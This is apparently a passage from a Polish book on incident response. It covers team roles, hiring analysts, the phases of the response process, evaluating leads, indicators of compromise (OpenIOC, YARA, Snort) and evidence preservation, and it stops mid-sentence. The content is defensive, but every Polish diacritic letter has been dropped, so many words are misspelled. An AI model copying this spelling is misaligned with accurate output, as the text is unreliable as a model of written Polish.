Na czas trwania procesu reakcji na incydent firmy zazwyczaj tworz zespoy zoone
z wyznaczonych osb, ktrych zadaniem jest przeprowadzenie dochodzenia i pozbycie si
problemu. Zespoem dowodzi dowiadczony kierownik, najlepiej jeli jest to kto potraficy
kierowa innymi jednostkami biznesowymi podczas ledztwa. Tego, jak wany jest ten ostatni
punkt, nie da si przeceni. Kierownik zespou musi szybko zdobywa informacje i zleca zadania
do wykonania wszystkim zasobom w organizacji. Dlatego jest nim czsto dyrektor ds. informatyki
i zabezpiecze albo kto mu bezporednio podlegy. Osoba ta staje si osi caego przedsiwzicia,
nadzoruje wiele dziaa oraz dba o to, by wszystko byo wykonywane, jak naley. Zespoem naprawczym
kieruje dowiadczony pracownik dziau informatycznego. Jest to posta, na ktrej spoczywa obowizek
koordynowania wszystkich czynnoci naprawczych, wcznie z dziaaniami podjtymi na podstawie
wynikw ledztwa, ocen stopnia poufnoci skradzionych danych oraz wprowadzeniem strategicznych
zmian majcych na celu zapewnienie wikszego bezpieczestwa firmy.
Wikszo organizacji obsadza zespoy reagowania i naprawczy osobami z rnych szczebli
i dziaw. Wrd nich podczas ledztwa czsto mona znale pracownikw wyszego szczebla
z dziaw IT, zwaszcza majcych dowiadczenie w analizowaniu dziennikw, informatyce ledczej
i rozpoznawaniu wirusw. Zesp ledczy powinien te mie szybki dostp do miejsc przechowywania
dziennikw, konfiguracji systemu oraz musi posiada uprawnienia do wyszukiwania potrzebnych
materiaw, jeeli w uyciu jest obejmujca cae przedsibiorstwo platforma reagowania na incydenty.
Ponadto w grupie mog znale si konsultanci, ktrzy bd opracowywa taktyk ledztwa, jeli
maj odpowiednie dowiadczenie. Zesp naprawczy z kolei powinien mie uprawnienia do tego,
aby nakaza wprowadzenie zmian potrzebnych do pozbycia si problemu.
Uwaga Uzyskanie uprawnie do wyszukiwania informacji w caym przedsibiorstwie moe by trudne,

poniewa istniej regulacje prawne i lokalne, ktre mog w tym przeszkadza, zwaszcza
na terenie Unii Europejskiej.
W zespoach pomocniczych tworzonych w razie potrzeby z reguy nie musz znajdowa si

ludzie zwizani ze ledztwem ani czynnociami naprawczymi. Ich praca zazwyczaj polega na
wykonywaniu konkretnych zada na danie kierownika ledztwa. Typowymi czonkami zespow
pomocniczych s:
wewntrzni i zewntrzni radcy prawni;
inspektorzy nadzoru (np. PCI, HIPAA, FISMA oraz NERC);
pracownicy pomocy technicznej;
czonkowie zespow zajmujcych si infrastruktur sieci;
dyrektorzy z pionu biznesowego;
przedstawiciele dziau zasobw ludzkich;
pracownicy dziau PR.
Skad zespow ledczych i naprawczych opisujemy w rozdziale 3., ale naley pamita, e
relacje i oczekiwania naley ustali z gry. Najgorszym momentem do otrzymania wytycznych
od rady lub inspektorw jest czas, gdy ledztwo ju trwa. Bardzo dobrym pomysem jest okrelenie
wszystkich wymogw dotyczcych raportowania i caego procesu w sposb odpowiedni dla
swojej brany.
Co powinno si wiedzie z perspektywy nadzoru? Jeli jeszcze nie odbye spotkania z inspektorami
wewntrznymi, ktrzy jednoczenie mog by gwnymi radcami prawnymi firmy, powi dzie
na rozmowy o cyklu incydentu. Dowiedz si, jakie systemy informatyczne s objte atakiem i jakie
obowizuj wymagania dotyczce skadania raportw.
W niektrych sytuacjach odpowied na pytanie o zasig moe by znaleziona innymi rodkami

(mog to by np. oceny zgodnoci z normami PCI DSS). Dowiedz si, kogo naley informowa
o potencjalnych wamaniach i przypadkach zamania zabezpiecze, a take jakie s zdefiniowane
progi powiadomie. Co najwaniejsze, znajd wewntrzn jednostk odpowiedzialn za komunikacj
na zewntrz i upewnij si, e czonkowie Twojego zespou mog rozmawia z decydentami bez
owijania w bawen.
Wewntrzna rada prawnikw powinna pomc w okreleniu odpowiadajcych jej progw
raportowania. Rne parametry (czas od identyfikacji zdarzenia, moliwo wycieku danych,
zakres potencjalnego wycieku) mog nie pasowa do parametrw okrelonych przez strony
zewntrzne.
Uwaga Jedn z bran, ktra notorycznie narzuca procesy i standardy ledczym, jest brana kart patniczych.
Gdy przedstawiciele tej gazi zostan zaangaowani w proces ledczy, prowadzone przez Ciebie
dziaania naprawcze maj drugorzdne znaczenie w porwnaniu z ich celem ochrony marki
i zmotywowania organizacji do spenienia wymogw standardu PCI DSS.
Wyszukiwanie utalentowanych specjalistw

do zespou reagowania na incydenty
Pracujemy w firmie wiadczcej usugi konsultacyjne na rzecz organizacji borykajcych si
z powanymi problemami dotyczcymi bezpieczestwa informacji. Biorc to pod uwag, wiemy,
e z caego serca powinnimy zaleca zatrudnianie konsultantw, jeli tylko wystpi jakiekolwiek
incydenty. To troch tak, jakby pyta przedstawiciela firmy Porsche, czy potrzebujemy najnowszego
modelu ich samochodu. Szczera odpowied na pytanie, czy dana firma powinna skorzysta z usug
konsultanta, czy zleci wykonanie wszystkich prac firmie konsultacyjnej, zaley od wielu czynnikw.
Oto one.
Koszt utrzymywania zespou reagowania na incydenty jeli tempo operacji nie
jest wysokie i nie mona wykaza ich wynikw, wiele firm nie moe sobie pozwoli
na utrzymywanie zespou dowiadczonych specjalistw od reagowania na incydenty
ani uzasadni jego istnienia.
Kultura zlecania zada na zewntrz wiele organizacji zleca rne zadania biznesowe,
wcznie z usugami IT. Ku naszemu zaskoczeniu kilka firm z listy Fortune 500 zleca
ogromn wikszo swoich usug informatycznych na zewntrz. Zjawisko to i jego implikacje
dla powodzenia reakcji na incydent omawiamy w jednym z kolejnych rozdziaw.
Upowanienie przez wadze nadzorujce i urzd certyfikacji przykadem zewntrznej
organizacji, ktra moe dyktowa, w jaki sposb ma by prowadzona akcja, jest Rada PCI
Security Standards Council. Jeeli Twoja firma dziaa w brany zwizanej z kartami
kredytowymi, wspomniana rada moe narzuci wymg, aby ledztwo prowadziy
zatwierdzone firmy.
Brak dowiadczenia w prowadzeniu ledztw wynajcie dowiadczonej firmy

konsultacyjnej moe by najlepszym sposobem na utworzenie zalka wasnego zespou
reagowania na incydenty (RI). Prowadzenie dochodze to dziaalno wymagajca
dowiadczenia i umiejtnoci w tym zakresie rosn wraz ze zdobywanym dowiadczeniem.
Brak lub ograniczone zasoby wasnych specjalistw prowadzenie ledztw, zwaszcza
dotyczcych wama, wymaga duych umiejtnoci i szerokiej wiedzy, od znajomoci
sposobu dziaania systemw operacyjnych, aplikacji i sieci po umiejtno analizowania
szkodliwych programw i przeprowadzenia czynnoci naprawczych.
Z wyjtkiem sytuacji, gdy firma nie ma w ogle adnego wewntrznego dziau IT, z naszego
dowiadczenia wynika, e organizacje utrzymujce wasne zespoy ds. reagowania na incydenty
maj wiksz szans na skuteczne ledztwo i szybkie rozwizanie problemu. Jest tak nawet wtedy,
kiedy zesp RI przeprowadzi tylko wstpne czynnoci ledcze przy zaangaowaniu pomocy
z zewntrz.
Uwaga Kiedy zatrudniamy zewntrznych ekspertw do pomocy w ledztwie, warto napisa umow
przy pomocy radcw prawnych, aby jej postanowienia byy zabezpieczone przed ujawnieniem.
Jak zatrudni talent

Zatrudnianie odpowiednich ludzi sprawia trudnoci wszystkim dyrektorom. Jeli masz zesp
i chcesz go powikszy, znalezienie odpowiedniej osoby moe by atwiejsze, poniewa w ocenie
umiejtnoci i osobowoci aplikanta moesz liczy na pomoc czonkw zespou. Ponadto ju
wiesz, jak si to robi i do jakich rl potrzebujesz ludzi, co uatwia sporzdzenie profilu idealnego
kandydata. Jeeli jednak znajdujesz si w sytuacji typowej dla specjalisty od zabezpiecze
informatycznych, ktry musi utworzy niewielki zesp RI, to od czego zaczniesz? Zalecamy
podzielenie procesu szukania pracownika na dwa etapy, czyli znalezienie kandydatw, a nastpnie
ocenienie ich kwalifikacji i tego, czy pasuj do Twojej firmy.
Znajdowanie kandydatw
Jednym z narzucajcych si pomysw jest rekrutowanie czonkw innych zespow RI. Dobrym
pomysem jest te umieszczenie ogosze w portalach typu LinkedIn, cho jest to metoda pasywna.
Szybsze efekty daje aktywne poszukiwanie kandydata np. w grupach technicznych, odpowiednich
mediach spoecznociowych i na tablicach ogosze. Do wielu specjalistw od informatyki ledczej
o rnym poziomie umiejtnoci mona dotrze wanie poprzez tablice ogosze, takie jak np.
Forensic Focus.
Jeli masz moliwo skontaktowania si z biurami karier orodkw uniwersyteckich,
na uczelniach z dobrym programem nauczania w dziedzinach informatyki, inynierii i informatyki
ledczej moesz znale pocztkujcych analitykw do zespou. Z naszego dowiadczenia wynika,
e najlepszych kandydatw do naszej pracy mona znale tam, gdzie program obejmuje jako
przedmiot gwny czteroletni kurs informatyki i inynierii oraz istnieje moliwo odbywania
dodatkowych kursw z informatyki ledczej albo zdobywania certyfikatw z tej dziedziny.
Odwrotnie jest natomiast w miejscach uczcych wszystkiego w ramach gwnego programu nauczania.
Podstawowe zdolnoci, jakie powinien posiada idealny kandydat, s takie same jak w wikszoci
innych dziedzin naukowych: s to zmys obserwacji oraz umiejtno porozumiewania si,
klasyfikowania, mierzenia, wnioskowania i przewidywania. Osoby obdarzone takimi talentami
s z reguy najlepszymi czonkami zespow RI. Jeli znajdziesz w pobliu swojej firmy uczelni,
ktrej program nauczania skupia si najpierw na podstawach nauki i inynierii oraz przewiduje
seminaria lub przedmioty fakultatywne z informatyki ledczej, masz szczcie.
Ocenianie przydatnoci kandydata: zdolnoci i cechy

Jakie zdolnoci powinni mie czonkowie Twojego zespou RI? Generalnie zesp taki powinien
skada si z osb o rnych talentach, takich, ktre maj wiedz i umiejtnoci pozwalajce im
przechodzi midzy kolejnymi fazami ledztwa. Patrzc na nasz grup konsultacyjn, dostrzegamy
pewne cechy, ktre wydaj si cenne. Jeli zatrudniasz dowiadczonych kandydatw, we pod
uwag to, czy maj ponisze kwalifikacje.
Dowiadczenie w prowadzeniu ledztw w rodowisku technologicznym jest to
szerokie pole obejmujce zarzdzanie informacjami i analizowanie tropw, umiejtno
wspdziaania z innymi jednostkami biznesowymi, zdolno analizowania dowodw
i danych oraz podstawowe umiejtnoci techniczne.
Dowiadczenie w prowadzeniu ekspertyz z zakresu informatyki ledczej na dowiadczenie
takie skada si znajomo podstaw dziaania systemw operacyjnych, znajomo artefaktw
systemw i aplikacji, umiejtno analizowania dziennikw oraz pisania zrozumiaej
dokumentacji.
Dowiadczenie w analizowaniu ruchu sieciowego jest to umiejtno badania ruchu
sieciowego i protokow oraz znajomo technologii pozwalajcych na wykorzystanie
zdobytych informacji w systemie detekcyjnym.
Znajomo aplikacji z brany dziaalnoci organizacji wikszo firm posiada
specjalne systemy przetwarzajce dane na specjalnych platformach (np. transakcje
finansowe odbywajce si na komputerach mainframe).
Znajomo zagadnie IT dla przedsibiorstw przy braku platformy RI nie ma nic
lepszego od administratora umiejcego napisa dwulinijkowy skrypt przeszukujcy
wszystkie znajdujce si pod jego kontrol serwery.
Umiejtno analizowania szkodliwego kodu rdowego osoba potrafica to robi
jest bardzo wanym czonkiem zespou, ale wikszo zespow RI moe si bez niej oby,
wykonujc podstawow analiz automatycznie w piaskownicy. Jeli masz trzy wolne
miejsca pracy, zatrudnij wszechstronne osoby posiadajce podstawow wiedz w zakresie
wykrywania szkodliwej dziaalnoci.
Jakie cechy osobowoci powinien mie czonek zespou RI? Podczas rozmw o prac prbujemy
dowiedzie si, czy kandydat ma nastpujce cechy:
wysokie kompetencje analityczne,
wysokie kompetencje komunikacyjne,
umiejtno dostrzegania szczegw,

metodyczne i zorganizowane podejcie do rozwizywania problemw,
udowodnione sukcesy w rozwizywaniu problemw.
Czsto jestemy pytani o to, czy rne certyfikaty, od ktrych roi si w branach informatyki
ledczej i RI, s co warte. Zasadniczo wszystkie certyfikaty wymagajce okresowego zdawania
testw i wykazywania, e kto cay czas si uczy, s dobrym wskanikiem, e taka osoba aktywnie
dziaa na pewnym polu. Jeli aplikant ma niewielkie dowiadczenie w pracy, na podstawie
odbytych przez niego szkole moemy wytypowa tematy do poruszenia podczas rozmowy o prac.
Ponadto, jeli testy certyfikacyjne s dostpne w internecie, moemy przy okazji sprawdzi
zdolnoci komunikacyjne kandydata oraz jego styl pisania. Jeli nie, to mamy dobry wskanik
prawdziwych umiejtnoci kandydata. W istocie zauwaamy odwrotn zaleno midzy gbi
wiedzy aplikanta i liczb posiadanych przez niego certyfikatw, jeli jego dowiadczenie zawodowe
jest solidne. Nieprzydatne z reguy s certyfikaty wydawane przez konkretne firmy, poniewa
stanowi one tylko powiadczenie umiejtnoci w zakresie posugiwania si konkretnymi
narzdziami, a nie posiadania gruntownej wiedzy teoretycznej i moliwoci dziaania.
PROCES REAKCJI NA INCYDENT

Proces reakcji na incydent skada si z wszystkich czynnoci, ktrych wykonanie jest konieczne,
aby osign cele tej reakcji. Cay proces i poszczeglne dziaania powinno si skrupulatnie
udokumentowa i przedstawi zespoowi RI oraz akcjonariuszom organizacji. Reakcja na incydent
skada si z trzech podstawowych czynnoci i z naszych dowiadcze wynika, e najlepiej, aby kad
z nich wykonywaa wyspecjalizowana grupa. S to:
czynnoci wstpne,
ledztwo,
naprawa.
Wstpna reakcja na incydent to czynno, ktra rozpoczyna waciwy proces reakcji na incydent.
Gdy zesp potwierdzi, e rzeczywicie doszo do zamania zabezpiecze, i przeprowadzi czynnoci
wstpne polegajce na zebraniu pocztkowego materiau dowodowego oraz podjciu wstpnych
rodkw zaradczych, dziaania ledcze i zaradcze s z reguy prowadzone rwnolegle. Celem zespou
ledczego jest wycznie przeprowadzenie ledztwa, w czasie ktrego specjalici tworz listy tzw.
tropw. Tropy to dajce si wykorzysta informacje o skradzionych danych, wskaniki sieciowe,
zidentyfikowane potencjalne podmioty lub problemy, ktre przyczyniy si do zaistnienia danej
sytuacji zagroenia lub zamania zabezpiecze. Wszystkie mog by natychmiast wykorzystane
przez specjalistw, ktrych procesy te musz by koordynowane i planowane, co wymaga czasu.
Czsto zdarza si tak, e odkryta aktywno jest na tyle grona, i trzeba natychmiast zareagowa,
aby zapobiec dalszej dziaalnoci intruza.
Czynnoci wstpne
Na tym etapie gwnym celem jest zebranie zespou RI, przejrzenie danych sieciowych i innych,
ktre s od razu dostpne, ustalenie rodzaju incydentu oraz ocena potencjalnych skutkw.
Chodzi o to, by zgromadzi informacje potrzebne zespoowi do podjcia decyzji, w jaki sposb
zareagowa.
Zazwyczaj na etapie tym nie zbiera si danych bezporednio z dotknitego systemu.
Najczciej informacje zdobyte w tej fazie dotycz sieci, dziennikw oraz innych dowodw
historycznych i kontekstowych. Na ich podstawie mona podj decyzj, jakie rodki zaradcze
przedsiwzi. Jeli np. ko trojaski zostanie znaleziony w laptopie dyrektora finansowego banku,
sposb dziaania bdzie cakiem inny ni w przypadku wykrycia tego szkodliwego programu
w komputerze recepcjonisty. Jeeli ponadto konieczne jest przeprowadzenie penego ledztwa,
informacje te bd czci pierwszych tropw. Oto lista niektrych czynnoci, ktre typowo
wykonuje si na tym etapie.
Przeprowadzenie rozmw z osobami, ktre zgosiy incydent, aby wydoby jak najwicej
przydatnych informacji.
Przeprowadzenie rozmw z pracownikami IT, ktrzy mog co wiedzie o szczegach
incydentu.
Przeprowadzenie rozmw z pracownikami z pionu biznesowego, ktrzy mog co wiedzie
na temat zdarze biznesowych mogcych mie zwizek z incydentem.
Przejrzenie dziennikw sieci i zabezpiecze w celu znalezienia informacji pozwalajcych
na potwierdzenie, e incydent mia miejsce.
Udokumentowanie informacji zebranych ze wszystkich rde.
ledztwo
Celem ledztwa jest ustalenie faktw dotyczcych tego, co si stao, jak do tego doszo oraz
w niektrych przypadkach kto jest za to odpowiedzialny. Dla komercyjnego zespou RI znalezienie
sprawcy moe by niemoliwe, ale wane jest, aby wiedzie, kiedy naley szuka pomocy na zewntrz
i u prawnikw. Bez znajomoci takich faktw jak te, w jaki sposb haker w ogle uzyska dostp
do sieci albo co zrobi, mamy mae szanse na skuteczne pozbycie si problemu. Jednym z pomysw
moe by po prostu odczenie komputerw od prdu i zbudowanie zainfekowanego systemu
od nowa, ale czy mona spa spokojnie, skoro nie wiadomo, jak haker si wama i co zrobi?
Poniewa bardzo cenimy zdrowy sen, opracowalimy i doszlifowalimy piciostopniowy proces
przedstawiony na rysunku 2.2., ktry umoliwia przeprowadzenie skutecznego ledztwa.
W nastpnych podpunktach opisujemy kady etap tego procesu.
Lepiej nie dziaa pochopnie
Podczas ledztwa zapewne natkniesz si na znaleziska, ktre Twoim zdaniem bd wymagay

natychmiastowej reakcji. Normalnie zespoy ledcze od razu zgaszaj takie krytyczne odkrycia
odpowiednim osobom w zainfekowanej organizacji. Osoby te musz wwczas rozway z jednej
strony ryzyko podjcia czynnoci bez dostatecznego rozumienia sytuacji, a z drugiej ryzyko
prowadzenia dalszych czynnoci rozpoznawczych. Z naszego dowiadczenia wynika, e najczciej
lepszym rozwizaniem jest bardzo dobre rozpoznanie sytuacji i dopiero wtedy podjcie
odpowiedniej decyzji. Jest to oczywicie ryzykowne, poniewa dajemy hakerowi moliwo
dalszego szkodzenia w systemie. Jednak wiemy te, e dziaanie bez posiadania kompletnych
i dokadnych informacji jest jeszcze bardziej ryzykowne. Krtko mwic, kady przypadek
jest inny i decydenci w organizacji musz samodzielnie podj jak najlepsz decyzj.
RYSUNEK 2.2. Fazy cyklu reakcji na incydent
Tropy wstpne
ledztwo bez jakichkolwiek tropw mija si z celem i dlatego zgromadzenie wstpnego materiau
ma krytyczne znaczenie dla powodzenia caej operacji. W wielu organizacjach spostrzeglimy bdn
praktyk polegajc na koncentrowaniu si wycznie na szukaniu szkodliwego oprogramowania.
Jest mao prawdopodobne, aby jedynym celem hakera byo zainstalowanie swojego programu.
Najczciej jego zamiary s cakiem inne, np. chce wykra wiadomoci e-mail albo dokumenty,
przechwyci hasa, zakci dziaanie sieci lub zmodyfikowa dane. Gdy przestpca wejdzie do
Twojej sieci i bdzie mia poprawne dane powiadczajce, nie bdzie musia uywa szkodliwego
oprogramowania, aby dosta si do innych systemw. Dlatego koncentrowanie si wycznie

na obecnoci programw moe sprawi, e umknie co wanego.
Pamitaj, e kade ledztwo powinno skupia si na badaniu tropw. Niejednokrotnie
prowadzilimy dochodzenia w przypadkach, gdy inne zespoy niewiele wykryy. Przyczyn wielu
takich niepowodze jest wanie to, e specjalici nie skupiaj si na szukaniu tropw, tylko
na mao znaczcych byskotkach, ktre nie przybliaj nikogo do rozwizania problemu.
Wielokrotnie udawao nam si dokonywa wanych dodatkowych odkry, takich jak np. utrata
duych iloci danych albo zdarzenia dostpu do poufnych systemw komputerowych.
Wystarczyo tylko poda dobrym tropem.
Czsto te zapomina si o ewaluacji nowych tropw pod ktem ich przydatnoci. Dodatkowy
czas powicony na tak ocen zwraca si pniej w postaci lepszego skupienia ledztwa na wanych
sprawach. W naszej pracy wyrniamy trzy typowe cechy dobrych tropw.
Istotno trop dotyczy aktualnie badanego incydentu. Moe si to wydawa oczywiste,
ale czsto si o tym zapomina. Organizacje zwykle popeniaj bd polegajcy na
kwalifikowaniu wszystkiego, co wydaje si podejrzane, jako rzeczy istotnej we wanie
prowadzonym ledztwie. Ponadto incydenty rzucaj nowe wiato na rodowisko
organizacji, ukazujc je w cakiem nowym wymiarze i odkrywajc wiele podejrzanych
dziaa, ktre w rzeczywistoci nie s niczym niezwykym. To powoduje przecienie
zespou prac i utrudnia ledztwo.
Szczegowo trop ma cechy okrelajce potencjalny kierunek ledztwa, np. zewntrzna
jednostka moe dostarczy trop wskazujcy, e komputer z Twojego rodowiska komunikowa
si z zewntrzn witryn internetow, na ktrej wykryto szkodliwe oprogramowanie. Cho
to mie z ich strony, e Ci o tym poinformowali, jednak taki trop nie jest zbyt szczegowy.
W takim przypadku naley postara si o wicej szczegw. Spytaj o dat i godzin zdarzenia
oraz adres IP kto, co, kiedy, gdzie, dlaczego i jak. Bez tych szczegw bdziesz tylko
marnowa czas.
Przydatno trop zawiera informacje, ktre mona wykorzysta, a Twoja organizacja
posiada rodki potrzebne do pjcia tym tropem. Wyobra sobie, e trop wskazuje na
transfer duych iloci danych do zewntrznej strony internetowej zwizanej z botnetem.
Masz dokadn dat i godzin oraz docelowy adres IP, ale Twoja organizacja nie dysponuje
dziennikami ruchu sieciowego i zapory sieciowej, ktre s potrzebne do zidentyfikowania
wewntrznego zasobu, z ktrego wypyny dane. W takim przypadku trop jest niezbyt
przydatny, poniewa nie da si powiza okrelonej aktywnoci z konkretnym komputerem
w Twojej sieci.
Tworzenie wskanikw zagroenia

Tworzenie wskanikw zagroenia (ang. Indicators of Compromise IOC) to proces polegajcy
na dokumentowaniu cech charakterystycznych i artefaktw incydentu w zorganizowany sposb.
Dokumentuje si wszystko zarwno z perspektywy hosta, jak i sieci nie tylko szkodliwe
oprogramowanie. Mog to by takie elementy jak nazwy katalogw roboczych, nazwy plikw
wyjciowych, zdarzenia logowania, mechanizmy utrwalania danych, adresy IP, nazwy domenowe,
a nawet sygnatury protokow sieciowych wykorzystywanych przez szkodliwe oprogramowanie.
Celem czynnoci IOC jest opisanie, wyraenie i znalezienie artefaktw zwizanych z incydentem.
Jako e IOC to tylko definicja, nie obejmuje konkretnego mechanizmu wyszukiwania. Konieczne
jest stworzenie lub zakupienie technologii wykorzystujcej jzyk IOC.
Wanym czynnikiem, ktry naley wzi pod uwag przy wybieraniu sposobu reprezentacji
wskanikw zagroenia, jest to, czy danego formatu mona uywa w organizacji. Sieciowe
wskaniki zagroenia s najczciej reprezentowane za pomoc regu Snort i mona znale
zarwno darmowe, jak i komercyjne produkty dla przedsibiorstw do ich obsugi. Z perspektywy
hosta niektre z dostpnych formatw IOC to:
OpenIOC firmy Mandiant (www.openioc.org),
CybOX firmy Mitre (cybox.mitre.org),
YARA (code.google.com/p/yara-project).
Dla dwch z tych formatw, OpenIOC i YARA, istniej darmowe narzdzia do tworzenia
wskanikw zagroenia. Firma Mandiant stworzya narzdzie dla systemu Windows o nazwie
IOC Editor, za pomoc ktrego mona tworzy i modyfikowa wskaniki zagroenia w standardzie
OpenIOC. Dla formatu YARA istnieje kilka narzdzi umoliwiajcych opracowanie i edytowanie
regu, a nawet automatycznie tworzcych reguy na podstawie otrzymanego szkodliwego
programu. Cechy dobrych wskanikw zagroenia i techniki ich tworzenia opisujemy
w rozdziale 5.
W INTERNECIE
IOC Editor www.mandiant.com/resources/download/ioc-editor
Narzdzia YARA www.deependresearch.org/2013/02/yara-resources.html
Wdraanie wskanikw zagroenia

Dokumentowanie wskanikw zagroenia za pomoc formatu IOC to doskonay pomys, ale najwicej
korzyci przynosi umoliwienie zespoowi RI wyszukiwania niepodanych elementw w sposb
automatyczny przy uyciu platformy RI albo za pomoc skryptw Visual Basic (VB) i technologii
WMI (ang. Windows Management Instrumentation). Powodzenie ledztwa zaley od moliwoci
szukania wskanikw zagroenia w caym przedsibiorstwie i automatycznego ich zgaszania to
wanie oznacza w naszym pojciu wdraanie wskanikw zagroenia. Zatem organizacja musi
mie moliwo implementowania wskanikw zagroenia albo nie bdzie miaa z nich adnego
poytku. Jeli chodzi o wskaniki sieciowe, sposb postpowania jest prosty wikszo rozwiza
obsuguje reguy Snort. Nie ma natomiast jeszcze powszechnie przyjtego standardu opisywania
wskanikw zagroe hosta. Z tego powodu korzystanie z takich wskanikw w ledztwie moe
by trudne. Zobaczmy, jakie s aktualnie moliwoci.
Brana a formaty wskanikw zagroenia
Caa brana bezpieczestwa komputerowego cierpi z powodu pewnego dotkliwego braku

nie ma powszechnie zaakceptowanego standardu dla hostowych wskanikw zagroenia.
Dla wskanikw sieciowych jako standard traktowany jest Snort, natomiast dla rozwiza
hostowych nie ma darmowego rozwizania skadajcego si z jzyka i narzdzi, ktre mona
by byo wykorzysta w przedsibiorstwie. Bez tego specjalici RI maj utrudnion prac, gdy
trzeba zdefiniowa hostowe wskaniki zagroenia.
Gdy pisalimy t ksik, istniay trzy dominujce definicje hostowych wskanikw zagroe
OpenIOC firmy Mandiant, CybOX firmy Mitre oraz YARA. Przyjrzymy si kademu z nich.
YARA to do dobrze ugruntowane jzyk i narzdzie, chocia w ich centrum zainteresowania
le gwnie szkodliwe programy. Standard OpenIOC firmy Mandiant jest znacznie bardziej
rozbudowany i istnieje oglnodostpne narzdzie o nazwie Redline, z ktrym mona go uywa.
Standard CybOX te jest rozbudowany, ale nie ma adnych narzdzi do wsppracy z nim
oprcz skryptw do konwersji formatu wskanikw zagroenia. aden z tych trzech standardw
nie doczeka si jeszcze darmowego narzdzia nadajcego si do uycia w przedsibiorstwach,
takiego jak Snort.
Aby korzysta ze wskanikw zagroenia, nie musisz mie duych rodkw, cho jeli chcesz
ich efektywnie uywa w caym przedsibiorstwie, prawdopodobnie bdziesz musia przeznaczy
na to due sumy. Istniej zarwno darmowe, jak patne narzdzia obsugujce standardy YARA
i OpenIOC do szukania wskanikw zagroenia. Jeli chodzi o rozwizania darmowe, to projekt
YARA zapewnia narzdzia do wyszukiwania regu YARA. Ponadto jest kilka otwartych projektw
rwnie obsugujcych reguy YARA niektre z nich s wymienione na podanej wczeniej stronie.
Firma Mandiant udostpnia darmowe narzdzie Redline, za pomoc ktrego mona szuka regu
OpenIOC w systemach. Bezpatne narzdzia s do skuteczne przy niewielkiej liczbie systemw,
ale jako ich pracy znacznie pogarsza si w wikszej skali. Aby skutecznie wyszukiwa wskaniki
zagroe w przedsibiorstwie, naley zainwestowa w rozwizanie na du skal. Przykadowo
narzdzie FireEye obsuguje reguy YARA, a komercyjne programy Mandiant rozpoznaj format
OpenIOC. Pamitaj jednak, e oprogramowanie i procesy obsugujce wskaniki zagroenia to
wci niezbyt ugruntowane narzdzia. Ten aspekt brany zabezpiecze zapewne jeszcze si zmieni
w najbliszych latach, wic miej oczy i uszy otwarte.
Identyfikowanie interesujcych systemw

Po wdroeniu wskanikw zagroenia zaczniesz otrzymywa tzw. trafienia (ang. hit). Trafienie to
zdarzenie dopasowania przez narzdzie czego do reguy IOC. Przed podjciem jakichkolwiek dziaa
zwizanych z tym zajciem naley dobrze przyjrze si otrzymanym informacjom i upewni, czy
nie jest to faszywy alarm. Jest to konieczne, poniewa niektre trafienia s bardzo oglne, wic nie
daj wysokiego stopnia pewnoci, a czasami zdarzaj si te po prostu faszywe alarmy. Niekiedy
udaje si zdoby niewielk ilo dodatkowych danych na temat zdarzenia. Jeeli trafienie nie daje
wysokiego stopnia pewnoci, nie mona od razu stwierdzi, e doszo do incydentu. Aby potwierdzi,
e naley zainteresowa si systemem, trzeba wykona kilka czynnoci.
Podczas identyfikowania systemw naley przeprowadza wstpn segregacj nowych informacji.
Postpujc zgodnie z poniszymi punktami, bdziesz mie pewno, e wicej czasu powicisz
na robienie tego, co trzeba, i nie rozproszysz dziaa ledczych.
Weryfikacja zbadaj wstpnie informacje o znalezionych elementach i sprawd, czy s
wiarygodne. Jeeli np. wskanik zagroenia pasuje tylko do nazwy jednego pliku, to czy
moe to by faszywy alarm? Czy nowe dane s spjne ze znanymi ramami czasowymi
prowadzonego ledztwa?
Kategoryzacja przyporzdkuj zidentyfikowany system do jednej lub wikszej liczby
kategorii uatwiajcych prowadzenie ledztwa w uporzdkowany sposb. Dowiadczenie
nauczyo nas, e oznaczenie systemu jako zamanego to za mao i powinno si unika tego
okrelenia. O wiele bardziej pomocne s kategorie, ktre wskazuj na rodzaj odkrytych
dziaa hakera, np. Zainstalowane tylne drzwi, Dostp przy uyciu prawidowych danych
powiadczajcych, SQL Injection, Kradzie danych powiadczajcych do wielu kont
lub Kradzie danych.
Szeregowanie wzgldem wanoci zidentyfikowanemu systemowi przypisz wzgldny
numer w szeregu w odniesieniu do wanoci odkrycia. Czsto stosowanym rozwizaniem
jest szeregowanie na podstawie czynnikw biznesowych, takich jak gwny uytkownik albo
typ przetwarzanych informacji. Metoda ta jednak pomija wan kwesti, a mianowicie nie
uwzgldnia innych czynnikw ledczych. Jeeli np. pocztkowe szczegy zidentyfikowanego
zagroenia w systemie zgadzaj si z odkryciami z innych systemw, dalsze badanie tego
systemu moe nie dostarczy adnych nowych tropw, wic system ten mona oznaczy
jako mniej wany. Z drugiej strony, jeeli szczegy sugeruj co nowego, np. inne tylne
drzwi, dobrym pomysem moe by nadanie systemowi wyszego priorytetu do analizy,
bez wzgldu na inne czynniki.
Zachowywanie dowodw
Po zidentyfikowaniu systemw i wykryciu aktywnych wskanikw zagroenia kolejnym krokiem
jest zbieranie dodatkowych danych do analizy. Zesp musi opracowa plan gromadzenia i zachowywania
materiau dowodowego, niezalenie od tego, czy ma to by robione w firmie, czy poza ni. Gwnym
celem zachowywania dowodw jest wykorzystanie procesu minimalizujcego zmiany w systemie i czas
interakcji z systemem oraz pozwalajcego na utworzenie odpowiedniej dokumentacji. Materia
dowodowy mona zbiera w dziaajcym systemie lub wyczy system w celu zrobienia jego obrazu.
Jako e kady zesp ma ograniczone rodki, nie ma sensu gromadzi wielkich iloci danych,
ktre nigdy nie zostan przebadane (chyba e bdzie ku temu bardzo dobry powd). Zatem dla
kadego nowego systemu, ktry zostanie zidentyfikowany, naley podj decyzj, jakiego rodzaju
dowodw szuka. Zawsze bierz pod uwag kontekst dziaania kadego systemu, wcznie z tym,
czy wyrnia si on czym od pozostaych lub czy przegld danych na ywo przyczynia si
do nowych odkry. Jeli uwaasz, e system ma jak wyjtkow cech albo masz jaki inny
przekonujcy powd, zachowaj dowody, ktre s Twoim zdaniem niezbdne do rozwoju ledztwa.
Do typowych materiaw dowodowych, ktre naley zachowa, zalicza si dane z analizy na ywo
dziaajcego systemu, pobieranie zawartoci pamici oraz obrazy dyskw na potrzeby ledztwa.
Analiza na ywo jest to najczciej stosowana metoda zdobywania dowodw w ramach
reakcji na incydent bezpieczestwa. Polega ona na zgromadzeniu za pomoc automatu
standardowego zestawu danych o dziaajcym systemie. Dane te zawieraj zarwno ulotne,
jak i nieulotne informacje, ktre dostarczaj szybkich odpowiedzi na niektre pytania
ledczych. Typowe dane gromadzone w ten sposb to listy procesw, aktywne poczenia
